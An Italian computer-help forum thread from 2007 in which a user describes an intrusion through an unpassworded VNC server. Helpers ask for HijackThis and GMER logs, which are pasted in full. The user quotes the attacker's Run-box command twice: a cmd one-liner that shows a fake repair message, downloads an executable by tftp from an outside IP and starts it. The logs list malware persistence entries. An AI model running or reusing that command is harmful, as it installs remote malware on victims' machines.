|
|||||||
|
|
|
 |
|
|
Strumenti |
21-11-2007, 08:41
|
#1 |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
Mi sono entrati nel pc in diretta con VNC!
Stamani è successa una cosa strana, ovvero l'iconcina di VNC in basso a SX (vicono l'orologio) è diventata NERA e il mouse si è cominciato a muovere da solo si è lanciata CMD poi voleva fare altro, sempre in ESEGUI è apparsa un altra scritta e a qaule punto ho fatto in tempo a spengere.
Alla riaccensione del pc, ho trovato scritto in esegui: %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET ynoiy.exe & start ynoiy& sarò riuscito a fare tutto in tempo o sono riusciti prima loro?? Cosa posso fare per verificare che tutto vada bene. C'è da dire, che  ieri sera visto che dovevo fare opera di beneficenza, ovvero aiutare amica 80enne che usa il pc a fare delle cose che non riusciva bene a fare, gli ho fatto installare il programma e mi ricordo che non sapendo bene come funzionare, per evitare che ci fossero problemi ho tolto la PASSWORD pure al mio  non mi ricordavo come funzionava il programma  adesso insomma cosa posso fare? Il pc dall'amica è sicuramente già attaccato, mi ha riferito di cose strane avvenute stanotte. 
Ultima modifica di zabb : 22-11-2007 alle 14:53. |
|
|
|
21-11-2007, 09:19
|
#2 |
|
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
VNC è composto da due parti, una parte è il Client e l'altra è il Server.
Client -> se impostato come Client può solo inviare la connessione Terminal Service ossia non può accettare connessioni entranti. Deve essere impostato in questa modalità nel pc sano che offre assistenza al pc "malato". Server -> impostato in tale modalità può sia inviare connessioni Terminal Service che accettare connessioni entranti è assolutamente importante impostare una password di sicurezza visto che significa concedere piena libertà al pc "malato". E' inoltre consigliabile vincolare la possibilità d'accesso ai pc che effettivamente devono collegarsi quindi vientando a tutti tranne quelli censiti nella lista. Per instaurare la connessione tra due pc Client -> Server è indispensabile conoscere l'IP almeno del Server. In sostanza chi ha fatto la connessione al tuo pc sapeva il tuo IP.
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
|
|
|
|
21-11-2007, 09:51
|
#3 | |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
Quote:
in effetti la cosa è strana, ma io penso che chi l'ha fatto l'abbia fatto a caso o provando perchè chi vuoi che sappia il mio IP? Tra l'altro anche se ho un router, ho appena visto che questo IP l'ho da 16 ore (la connessione è li da 16 ore) prima sarà stato un altro. Ma apparte questo aspetto, è possibile che sia avvenuto tutto non a mano di un uomo ma del pc, le operazioni che ho visto fare sotto i miei occhi erano eseguite velocemente  bah, può passare il mio pc, che naviga tra forum, email (non so se nell'email c'è pure l'ip) ma quello di questa signora che non fa nulla di ciò  boh davvero strano, cmq apparte tutto... adesso cancello questo programma e lo faccio fare pure a lei ma a questo punto cosa posso fare per verificare che sia tutto ok? A me penso non abbia fatto in tempo a fare nulla, perchè l'ho bloccato appena ha incollato quel codice in ESEGUI ma alla signora ha fatto qualcosa di sicuro, anche se facendo la scansione con antivir non da nulla. il suo codice è questo: %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET wjxuho.exe & start wjxuho& cosa posso(iamo) farte per stare più sicuri? sono molto preoccupato per quanto riguarda eventuali operazioni da fare online, temo possano carpirmi dati. Ora richiudo pure le porte aperte per VNC, posso stare sicuro? grazie |
|
|
|
|
|
21-11-2007, 13:36
|
#4 |
|
Senior Member
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3397
|
forse hoi interpretato male il comando,ma sembra che ti abbia fatto scaricare un file
quell'ip è francese. posta un log di hijackthis terminando vnc avrebbe dovuto essere sbattuto fuori dal pc
__________________
Rimozione Worm/Rootkit Bagle - Rimozione Trojan Vundo - Rimozione virus MSN Messenger -Rimozione virus su chiavetta o errori di file mancante all'apertura del disco fisso - NT AUTHORITY SYSTEM spegne il pc ad ogni avvio. Cosa fare?(worm sasser/blaster/rustock) - Thread Ufficiale firewall software |
|
|
|
|
21-11-2007, 15:03
|
#5 | |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
Quote:
Quanto prima faccio un log! grazie |
|
|
|
|
|
21-11-2007, 16:54
|
#6 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
Edit: usi Msn Messenger?
__________________
Try again and you will be luckier.
Ultima modifica di Chill-Out : 21-11-2007 alle 17:03. |
|
|
|
|
|
21-11-2007, 21:16
|
#7 |
|
Senior Member
Iscritto dal: Feb 2007
Città: Roma
Messaggi: 2155
|
ynoiy.exe:
 stessi risultati per wjxuho.exe Scusate l'intromissione.
__________________
Kaspersky Virus Removal Tool | Avira AntiVir Rescue System | Threatfire in Italiano | Norton User Account Control (beta) La tua prossima affermazione sarà un No? Rispondi con un Si o un No.
 |
|
|
|
|
21-11-2007, 21:24
|
#8 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
da dove è uscito il sample?
__________________
Try again and you will be luckier.
|
|
|
|
|
21-11-2007, 21:27
|
#9 |
|
Senior Member
Iscritto dal: Feb 2007
Città: Roma
Messaggi: 2155
|
Ho fatto l'upload da VM.
__________________
Kaspersky Virus Removal Tool | Avira AntiVir Rescue System | Threatfire in Italiano | Norton User Account Control (beta) La tua prossima affermazione sarà un No? Rispondi con un Si o un No.
|
|
|
|
|
21-11-2007, 21:29
|
#10 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
21-11-2007, 21:31
|
#11 | ||
|
Senior Member
Iscritto dal: Feb 2007
Città: Roma
Messaggi: 2155
|
Ho usato questi:
Quote:
Quote:
__________________
Kaspersky Virus Removal Tool | Avira AntiVir Rescue System | Threatfire in Italiano | Norton User Account Control (beta) La tua prossima affermazione sarà un No? Rispondi con un Si o un No.
|
||
|
|
|
|
21-11-2007, 21:39
|
#12 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
a ecco pensavo avessi già il sample.
__________________
Try again and you will be luckier.
Ultima modifica di Chill-Out : 21-11-2007 alle 21:43. |
|
|
|
|
22-11-2007, 14:22
|
#13 | |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
Quote:
Si ho ed uso MSN. Ma può essere una cosa grave? Mi chiedo io, ma con l'Antivirus e il firewall del router posso stare minimamente sicuro? questo il log: Codice:
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 15.27.18, on 22/11/2007
Platform: Windows XP (WinNT 5.01.2600)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmi\AntiVir PersonalEdition Classic\avguard.exe
C:\Programmi\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Programmi\File comuni\Real\Update_OB\realsched.exe
C:\Programmi\AntiVir PersonalEdition Classic\avgnt.exe
C:\Programmi\SAMSUNG\FW LiveUpdate\FWManager.exe
C:\Programmi\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Programmi\MSN Messenger\MsnMsgr.Exe
C:\Programmi\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Programmi\WinZip\WZQKPICK.EXE
C:\Programmi\FreePOPs\freepopsd.exe
C:\WINDOWS\twain_32\A4CIS\WATCH.exe
C:\PROGRA~1\Mozilla Firefox\firefox.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Programmi\MSN Messenger\usnsvc.exe
C:\Programmi\MSN Messenger\livecall.exe
C:\Programmi\Outlook Express\msimn.exe
C:\Programmi\Messenger\msmsgs.exe
C:\Programmi\eMule\emule.exe
C:\Documents and Settings\Andrea\Desktop\HiJackThis_v2.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe,"c:\windows\asuspack.exe","c:\windows\wifihlp.exe","c:\windows\delldrv.exe","c:\windows\symantec-service.exe","c:\windows\macromediahelper.exe",
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.6.0_02\bin\ssv.dll
O2 - BHO: &Google - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Programmi\Google\googletoolbar1.dll
O2 - BHO: (no name) - {DA39029C-D291-A968-3FF4-D0990D5CB5FC} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\programmi\google\googletoolbar4.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [TkBellExe] "C:\Programmi\File comuni\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx2\PXConsole.exe"
O4 - HKLM\..\Run: [avgnt] "C:\Programmi\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [crtfmon] C:\explorer.exe
O4 - HKLM\..\Run: [Name of App] C:\Programmi\SAMSUNG\FW LiveUpdate\FWManager.exe r
O4 - HKLM\..\Run: [InCD] C:\Programmi\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmi\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [RSS Xpress] C:\Programmi\RSS Xpress\RSS Xpress.exe
O4 - HKCU\..\Run: [RssReader] C:\Programmi\RssReader\RssReader.exe
O4 - HKCU\..\Run: [swg] C:\Programmi\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programmi\File comuni\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [NBJ] "C:\Programmi\Ahead\Nero BackItUp\NBJ.exe"
O4 - HKLM\..\Policies\Explorer\Run: [wifihlp] "c:\windows\wifihlp.exe"
O4 - HKLM\..\Policies\Explorer\Run: [1] C:\WINDOWS\service32.exe
O4 - HKLM\..\Policies\Explorer\Run: [delldrv] "c:\windows\delldrv.exe"
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVIZIO LOCALE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVIZIO DI RETE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Startup: FreePOPs (2).lnk = C:\Programmi\FreePOPs\freepopsd.exe
O4 - Startup: Watch.lnk = C:\WINDOWS\twain_32\A4CIS\WATCH.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmi\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Programmi\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Google Search - res://c:\programmi\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\programmi\google\GoogleToolbar2.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\programmi\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\programmi\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: E&sporta in Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://c:\programmi\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\programmi\google\GoogleToolbar2.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_02\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_02\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {4FAE30E1-EE9C-477D-8D06-BF8D3429B60F} (WebIQ Technology Client) - https://www.webiqonline.com/WebIQ/bin/WebIQ.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1143716638142
O16 - DPF: {70BA88C8-DAE8-4CE9-92BB-979C4A75F53B} (GSDACtl Class) - http://launch.gamespyarcade.com/software/launch/alaunch.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab31267.cab
O20 - AppInit_DLLs: C:\:olvh2.dll
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\Browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\Browseui.dll
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Programmi\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programmi\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Programmi\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NMIndexingService - Unknown owner - C:\Programmi\File comuni\Ahead\Lib\NMIndexingService.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx2\PXAgent.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Programmi\RealVNC\VNC4\WinVNC4.exe
--
End of file - 8588 bytes
Ultima modifica di zabb : 22-11-2007 alle 14:37. |
|
|
|
|
|
22-11-2007, 14:37
|
#14 |
|
Senior Member
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3397
|
i log vanno messi fra i tag code o allegati su zshare.net
__________________
Rimozione Worm/Rootkit Bagle - Rimozione Trojan Vundo - Rimozione virus MSN Messenger -Rimozione virus su chiavetta o errori di file mancante all'apertura del disco fisso - NT AUTHORITY SYSTEM spegne il pc ad ogni avvio. Cosa fare?(worm sasser/blaster/rustock) - Thread Ufficiale firewall software |
|
|
|
|
22-11-2007, 14:39
|
#15 | |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
Quote:
 Ho fatto pure l'analisi guidata e qualcosina c'è ma non so bene...
|
|
|
|
|
|
22-11-2007, 14:41
|
#16 |
|
Senior Member
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3397
|
ok. non hai nemmeno il SP1 Prima di pulire aggiorna windows.
Poi serve un log di gmer http://www.gmer.net/gmer.zip
__________________
Rimozione Worm/Rootkit Bagle - Rimozione Trojan Vundo - Rimozione virus MSN Messenger -Rimozione virus su chiavetta o errori di file mancante all'apertura del disco fisso - NT AUTHORITY SYSTEM spegne il pc ad ogni avvio. Cosa fare?(worm sasser/blaster/rustock) - Thread Ufficiale firewall software |
|
|
|
|
22-11-2007, 14:45
|
#17 |
|
Senior Member
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3397
|
__________________
Rimozione Worm/Rootkit Bagle - Rimozione Trojan Vundo - Rimozione virus MSN Messenger -Rimozione virus su chiavetta o errori di file mancante all'apertura del disco fisso - NT AUTHORITY SYSTEM spegne il pc ad ogni avvio. Cosa fare?(worm sasser/blaster/rustock) - Thread Ufficiale firewall software |
|
|
|
|
22-11-2007, 15:22
|
#18 |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3597
|
ora faccio le altre cose che mi hai detto
 Codice:
GMER 1.0.13.12551 - http://www.gmer.net Rootkit scan 2007-11-22 16:21:14 Windows 5.1.2600 ---- System - GMER 1.0.13 ---- SSDT pxfsf.sys ZwAlertResumeThread SSDT pxfsf.sys ZwAllocateUserPhysicalPages SSDT pxfsf.sys ZwAllocateVirtualMemory SSDT pxfsf.sys ZwClose SSDT pxfsf.sys ZwCompactKeys SSDT pxfsf.sys ZwCompressKey SSDT pxfsf.sys ZwCreateDirectoryObject SSDT pxfsf.sys ZwCreateEvent SSDT pxfsf.sys ZwCreateEventPair SSDT pxfsf.sys ZwCreateFile SSDT pxfsf.sys ZwCreateIoCompletion SSDT pxfsf.sys ZwCreateJobObject SSDT pxfsf.sys ZwCreateKey SSDT pxfsf.sys ZwCreateMailslotFile SSDT pxfsf.sys ZwCreateMutant SSDT pxfsf.sys ZwCreateNamedPipeFile SSDT pxfsf.sys ZwCreatePort SSDT pxfsf.sys ZwCreateProcess SSDT pxfsf.sys ZwCreateProcessEx SSDT pxfsf.sys ZwCreateSection SSDT pxfsf.sys ZwCreateSemaphore SSDT pxfsf.sys ZwCreateSymbolicLinkObject SSDT FA0CA674 ZwCreateThread SSDT pxfsf.sys ZwCreateTimer SSDT pxfsf.sys ZwCreateToken SSDT pxfsf.sys ZwDeleteFile SSDT pxfsf.sys ZwDeleteKey SSDT pxfsf.sys ZwDeleteValueKey SSDT pxfsf.sys ZwDeviceIoControlFile SSDT pxfsf.sys ZwDuplicateObject SSDT pxfsf.sys ZwEnumerateKey SSDT pxfsf.sys ZwEnumerateValueKey SSDT pxfsf.sys ZwFreeUserPhysicalPages SSDT pxfsf.sys ZwFreeVirtualMemory SSDT pxfsf.sys ZwImpersonateAnonymousToken SSDT pxfsf.sys ZwImpersonateThread SSDT pxfsf.sys ZwLoadDriver SSDT pxfsf.sys ZwLoadKey SSDT pxfsf.sys ZwLoadKey2 SSDT pxfsf.sys ZwLockRegistryKey SSDT pxfsf.sys ZwLockVirtualMemory SSDT pxfsf.sys ZwMapViewOfSection SSDT pxfsf.sys ZwOpenFile SSDT pxfsf.sys ZwOpenKey SSDT FA0CA660 ZwOpenProcess SSDT pxfsf.sys ZwOpenProcessToken SSDT pxfsf.sys ZwOpenSection SSDT FA0CA665 ZwOpenThread SSDT pxfsf.sys ZwOpenThreadToken SSDT pxfsf.sys ZwProtectVirtualMemory SSDT pxfsf.sys ZwQueryInformationProcess SSDT pxfsf.sys ZwQueryInformationThread SSDT pxfsf.sys ZwQueryKey SSDT pxfsf.sys ZwQueryMultipleValueKey SSDT pxfsf.sys ZwQueryOpenSubKeys SSDT pxfsf.sys ZwQueryValueKey SSDT pxfsf.sys ZwQueueApcThread SSDT pxfsf.sys ZwReadFile SSDT pxfsf.sys ZwReadVirtualMemory SSDT pxfsf.sys ZwRenameKey SSDT pxfsf.sys ZwReplaceKey SSDT pxfsf.sys ZwRestoreKey SSDT pxfsf.sys ZwResumeProcess SSDT pxfsf.sys ZwResumeThread SSDT pxfsf.sys ZwSaveKey SSDT pxfsf.sys ZwSaveKeyEx SSDT pxfsf.sys ZwSaveMergedKeys SSDT pxfsf.sys ZwSetContextThread SSDT pxfsf.sys ZwSetInformationKey SSDT pxfsf.sys ZwSetInformationProcess SSDT pxfsf.sys ZwSetInformationThread SSDT pxfsf.sys ZwSetSystemInformation SSDT pxfsf.sys ZwSetValueKey SSDT pxfsf.sys ZwSuspendProcess SSDT pxfsf.sys ZwSuspendThread SSDT pxfsf.sys ZwSystemDebugControl SSDT pxfsf.sys ZwTerminateJobObject SSDT FA0CA66F ZwTerminateProcess SSDT pxfsf.sys ZwTerminateThread SSDT pxfsf.sys ZwUnloadDriver SSDT pxfsf.sys ZwUnloadKey SSDT pxfsf.sys ZwUnloadKeyEx SSDT pxfsf.sys ZwUnlockVirtualMemory SSDT pxfsf.sys ZwUnmapViewOfSection SSDT pxfsf.sys ZwWriteFile SSDT FA0CA66A ZwWriteVirtualMemory ---- Kernel code sections - GMER 1.0.13 ---- .text ntoskrnl.exe!ZwCallbackReturn + 2064 804F7330 24 Bytes [ 79, 48, 94, F9, 83, 48, 94, ... ] .text ntoskrnl.exe!ZwCallbackReturn + 2080 804F734C 16 Bytes [ B5, 48, 94, F9, BF, 48, 94, ... ] .text ntoskrnl.exe!ZwCallbackReturn + 2094 804F7360 12 Bytes [ DD, 48, 94, F9, E7, 48, 94, ... ] .text ntoskrnl.exe!ZwCallbackReturn + 20A4 804F7370 24 Bytes [ FB, 48, 94, F9, 05, 49, 94, ... ] .text ntoskrnl.exe!ZwCallbackReturn + 2160 804F742C 12 Bytes [ A5, 49, 94, F9, AF, 49, 94, ... ] .text ... ---- User code sections - GMER 1.0.13 ---- .text C:\Programmi\MSN Messenger\MsnMsgr.Exe[1196] kernel32.dll!SetUnhandledExceptionFilter 77E79287 9 Bytes JMP 004DE392 C:\Programmi\MSN Messenger\MsnMsgr.Exe ---- User IAT/EAT - GMER 1.0.13 ---- IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\ADVAPI32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\RPCRT4.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\System32\WS2_32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\System32\WS2HELP.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\USER32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\GDI32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\ole32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\System32\iphlpapi.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\System32\NETAPI32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\System32\Secur32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\CRYPT32.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\USERENV.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL IAT C:\PROGRA~1\Mozilla Firefox\firefox.exe[2136] @ C:\WINDOWS\system32\WININET.dll [KERNEL32.dll!LoadLibraryA] [01A57376] C:\PROGRA~1\Mozilla Firefox\extensions\talkback@mozilla.org\components\FULLSOFT.DLL AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_NAMED_PIPE [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLOSE [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_READ [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_WRITE [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_INFORMATION [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_INFORMATION [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_EA [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_EA [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FLUSH_BUFFERS [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_VOLUME_INFORMATION [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_VOLUME_INFORMATION [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DIRECTORY_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FILE_SYSTEM_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_INTERNAL_DEVICE_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SHUTDOWN 